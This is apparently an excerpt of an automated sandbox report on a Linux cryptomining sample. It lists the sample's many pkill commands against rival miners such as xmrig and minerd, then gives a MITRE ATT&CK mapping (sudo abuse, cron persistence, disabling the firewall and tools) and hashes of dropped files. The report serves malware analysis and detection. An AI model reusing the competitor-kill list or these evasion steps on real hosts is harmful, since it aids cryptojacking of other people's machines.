/usr/bin/pkillpkill -f JnKihGjn2⤵
-
-
/usr/bin/pkillpkill -f irqba2anc12⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f irqba5xnc12⤵
-
-
/usr/bin/pkillpkill -f irqbnc12⤵
-
-
/usr/bin/pkillpkill -f ir29xc12⤵
-
-
/usr/bin/pkillpkill -f conns2⤵
-
-
/usr/bin/pkillpkill -f irqbalance2⤵
-
-
/usr/bin/pkillpkill -f crypto-pool2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f XJnRj2⤵
-
-
/usr/bin/pkillpkill -f mgwsl2⤵
-
-
/usr/bin/pkillpkill -f pythno2⤵
-
-
/usr/bin/pkillpkill -f jweri2⤵
-
-
/usr/bin/pkillpkill -f lx262⤵
-
-
/usr/bin/pkillpkill -f NXLAi2⤵
-
-
/usr/bin/pkillpkill -f BI5zj2⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f askdljlqw2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f minerd2⤵
-
-
/usr/bin/pkillpkill -f minergate2⤵
-
-
/usr/bin/pkillpkill -f Guard.sh2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f ysaydh2⤵
-
-
/usr/bin/pkillpkill -f bonns2⤵
-
-
/usr/bin/pkillpkill -f donns2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f kxjd2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f Duck.sh2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f bonn.sh2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f conn.sh2⤵
-
-
/usr/bin/pkillpkill -f kworker342⤵
-
-
/usr/bin/pkillpkill -f kw.sh2⤵
-
-
/usr/bin/pkillpkill -f pro.sh2⤵
-
-
/usr/bin/pkillpkill -f polkitd2⤵
-
-
/usr/bin/pkillpkill -f acpid2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f icb5o2⤵
-
-
/usr/bin/pkillpkill -f nopxi2⤵
-
-
/usr/bin/pkillpkill -f irqbalanc12⤵
-
-
/usr/bin/pkillpkill -f minerd2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f i5862⤵
-
-
/usr/bin/pkillpkill -f gddr2⤵
-
-
/usr/bin/pkillpkill -f mstxmr2⤵
-
-
/usr/bin/pkillpkill -f ddg.20112⤵
-
-
/usr/bin/pkillpkill -f wnTKYg2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f deamon2⤵
-
-
/usr/bin/pkillpkill -f disk_genius2⤵
-
-
/usr/bin/pkillpkill -f sourplum2⤵
-
-
/usr/bin/pkillpkill -f polkitd2⤵
-
-
/usr/bin/pkillpkill -f nanoWatch2⤵
-
-
/usr/bin/pkillpkill -f zigw2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f devtool2⤵
-
-
/usr/bin/pkillpkill -f devtools2⤵
-
-
/usr/bin/pkillpkill -f systemctI2⤵
- Reads CPU attributes
-
-
/usr/bin/pkillpkill -f watchbog2⤵
-
-
/usr/bin/pkillpkill -f cryptonight2⤵
-
-
/usr/bin/pkillpkill -f sustes2⤵
-
-
/usr/bin/pkillpkill -f xmrig2⤵
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f xmrig-cpu2⤵
-
-
/usr/bin/pkillpkill -f 121.42.151.1372⤵
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1Scheduled Task/Job
1Cron
1Defense Evasion
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5B
MD5727479ef7cedf30c03459bec7d87b0f0
SHA12082e7f715f058acab2398d25d135cf5f4c0ce41
SHA25629872037c9573567744ef10ed2de57864ded7554c9fa2ef03fc1244c65794ba6
SHA5124cb59d37f8481f9bb2745f494baa0910a68aad40ac2903ef1513547e091e1e772a5f9436f789ab91fcafb75b8a28c2112ede89004be41f33c01d936b542ca6ba
-
Filesize
825B
MD5c1c72e24696f1967ec6fefa8ef40de1c
SHA147db5c4385bee00987a9403b2e336597fdbb64ca
SHA25638abf346d753dcb9b1609bfb58050ae4b7228ac5ab1314a86e742deead084ba1
SHA5122a2eba2a7173951414f529f08885e5be3e61d5f6fda020880ebf14ce8fa9dbfc877cbe15d1756fb14fc52d6bcf9ff60b999cc3ed8f05a3529d82385f43db3d79
-
Filesize
1KB
MD58a87979fe9979f930895480b223acf45
SHA1862beea68f7dc63ef50ceb1729f619ecd4a2871b
SHA2564d2610b4588685590ece97426a4a928e0856bc1e8cea563bfa29b0e49ba9643d
SHA512f566a05a767b85990055ae171c6d3664ff935f4b4fd24ec505e03290cde13ace60bfd0258debf993eb09ca47c29d00cd0c0fbe7a0d3bce1b19bd1a3015759669
-
Filesize
175B
MD57be4ec7ad7805d18a824186ce3d1863d
SHA1cbd4235e4eaafbba0087a91ad3b560c8a47d7f6b
SHA256fd79847a1e1cc7e1f2cb4866b5a9edcdab6ec32ef05a2eea71e8723f85584f48
SHA5120347b26a2d2c5bed86668057ed6639bc9c24e26f469f5aad4cc65caa2b45034d0615483220ee1a9acbba6bbb3f9bceb1346f5640e0d14e30b2eb3e4354752b8f
-
Filesize
318B
MD5b89a2382fdb05712b77a6027c9d8b80a
SHA116c171d65d893390c5d220cc38327f9a0070f45a
SHA2564b5ae72e629f2e0a4051d16f1e0c6c2a29594c9d98cac8cc31d264a0d61fd853
SHA5129ca2104e537e43033a5820b771a6ef8b945e581097f8ade33872b6a750658487140194256a43b07efdfd63dbb8c28859c7760bcf21f28a2852efcba4bc9e9da1
-
Filesize
175B
MD57b7c3120d007a435aa33293be869d413
SHA12ddeb633494b191293237cfe6cd9d8e98708b7cd
SHA256daba24f21000a2d043e2da80d6316640590ba5b26b2dd7d0885e81318ecf063a
SHA5120a71821e43dccaa9c65cff72b61b53953cdb421b273e5f4d204ae1f17d105311fe77eb9950e49dd569f6ba3a9c4abd862a7f323b94a97da82670e1f58696fbad
-
Filesize
175B
MD5cacb33258735ecfca5d30c8c91cd08d1
SHA1a56942eb286b71d5ddf1374bfb91221f54505acf
SHA25640c76878b92a07d44a4cfedae583e579a7fc3e2ea34285d84e4eee8365dadda2
SHA512092d8b58cfe338eb7839d01d2c5e1de645b9d2d95b7d459eda5a6a5c1a491f298323f534a92a481da73f9f1635074bc082dbb4c6334a5eaa2232156a48f0a784
-
Filesize
175B
MD5791bcc0af7f62868bd6457e678894f0a
SHA1356185cd761b9943854428f29aa650e764bd557a
SHA2568b34681a3280382654cf79c53dcfcb6e7ef382f9e553cef0d8bf08ee436d9431
SHA512e19f79bfbb3377e9f3bef984c139d7699662389aee24df1159f997aa744ce4aeb59c4ba87438aebeecb33edf226d1ae7ed2d7a222a50693c7e9fcd42d1a5caae
-
Filesize
128B
MD5705cd3d9bd5b3c19eba4f5b481fb50b3
SHA1518fe4f8cca025fb723f641702bb9c37520c4b04
SHA25697086bcce5a8d8ba6d6b2c0415734d95e346f3dc61789f16608aebb00516c395
SHA5127a1a3a29d2ec92e61c3dcf970ce2bfade2c8b78640afc106d45008854a649da863f43ce43590d84eb8336da1952df57fa29482e7d2e0b07633705df9ce8c66ad
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
146B
MD51c074672cf728af1a20abbca4bed0186
SHA17a667830550c85e9f4c8ba8c9c3ec15be58f0128
SHA25655bbd7b4c5a2bb267b034061cd998e322db5775c309a42a2e0ce900b64176422
SHA512e9e84c57c336e46ac16881eeaf230abc00db86f89d0526cc9ed2b77d25c1729a9cbc48575900833f5381ebdc0cf4a3f50b8d003ec816785b64c40d4ef42c51a3
-
Filesize
915B
MD54fb4b33b7288f00697d990b9a2c7bbd9
SHA1dde4862665231500325500632444fcf7912a7f1d
SHA25669d44a5b8945f687b5d3e78af0e8fc07cf13cc4dc9bd40198bcafa145877a287
SHA51271bc5df09cd9c5c994d9c2889d1150973d7641731d4704a9e41211a1da720aaf30c351e2cd7110fb1c897b78e129bde1d25fa317fda03461467ab690be674973
-
Filesize
288B
MD553c15a3d1caa82c3de26a5fe81a44ac3
SHA169bc661e9a61ee4191b58ee0b674a8184b93551d
SHA25651b028256b0827ba0f16136772b0a9a7c6479f33890dde7dbcada913c1f56275
SHA512f7a2e6279b593024e66d49dbd8ae3a51446c279734d303f18b48d306b4dd2250a5930985404a4aac6f768410de703166845bb904783cffd8f2bd103acbb49497
-
Filesize
89B
MD5f376ab0b397bc9a5ee0a0f2fd977b146
SHA10a315ce6b6bc5eb1553da95c52ca057fd3732ba9
SHA256424c01eaac55d1454c6695c9c0317e98cc8bc89faec97a041f47896dcd48e824
SHA51265da2bea097dc6a23da3d5db280a613d09ce0c06dc6327003ef7a73a2efb8fb29f9948ee190147e4b8a268aee3a34629969ac2c6f7b7edd5e9aa815e320fb633
-
Filesize
288B
MD5d359161d34edbc1dd9349f47e7c37bd9
SHA146b10632993a970c2e3f1469816c8419131697ec
SHA2564573164e5322931d59fc16bcc4a80166aa35d7a248abff408ae5f11ed9e7dc1c
SHA512cf326a16d4f3cbfc7ec63d84b14a21f5b6b3ba17a7be814c1eae245de18d8372263c0108a6ae5766f16c9c48cff3615b1c05bb51bf66c95f5a4d18b984c4a782
-
Filesize
89B
MD56cb3e6bd46b3d0fb922e8239effb503c
SHA1c6725dfe02e2ec56e104e00995447d810b7797f4
SHA2566b55220c140aa6047daea9cc4ddacd69a04a38a90c6565e4fb28a777c22cfa56
SHA5124b935a7be4d35feb08a6760be9f1e2f62caea8ec07f3d90fd123e47e99798772411eb6e7f6c34d3d53d8f9a56cffc7f7f6cc4ffa887d543175387bc6a516b038